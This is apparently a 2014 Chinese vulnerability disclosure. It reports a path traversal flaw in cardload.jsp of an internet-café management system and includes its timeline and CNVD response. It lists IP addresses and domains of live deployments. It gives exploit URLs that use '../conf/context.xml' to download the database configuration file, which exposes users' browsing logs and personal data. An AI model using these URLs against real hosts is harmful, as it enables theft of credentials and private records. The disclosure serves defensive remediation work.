2014-05-16:细节已通知厂商并且等待厂商处理中
2014-05-21:厂商已经确认,细节仅向厂商公开
2014-05-31:细节向核心白帽子及相关领域专家公开
2014-06-10:细节向普通白帽子公开
2014-06-20:细节向实习白帽子公开
2014-06-30:细节向公众公开
文件下载模块对文件路径未做限制导致可任意下载文件
详细说明:cardload.jsp的filename参数对../字符未做过滤,导致可任意下载文件
目前很多地区网吧都在用,系统里记录了上网人个人信息,各种上网日志,数量巨大~~
www.tl-hh.cn
219.148.180.5
219.148.180.4
202.100.98.122
202.100.85.25
tl-lanzhou.cn
www.tl-dianxin.cn
58.18.184.26
tl-wangtong.cn
58.18.22.136
http://58.18.172.197/cardload.jsp?filename=../conf/context.xml&maininfo_id=796
http://202.100.98.122/cardload.jsp?filename=../conf/context.xml&maininfo_id=796
../conf/context.xml为数据库配置文件
系统可查网吧上网记录
版权声明:转载请注明来源 Asuimu@乌云 漏洞回应 厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-05-21 08:25
厂商回复:CNVD确认并复现所述多个实例情况,已经由CNVD通过公开渠道联系软件生产厂商处置,联系同联科技 0431-,邮件和电话通报。
最新状态:暂无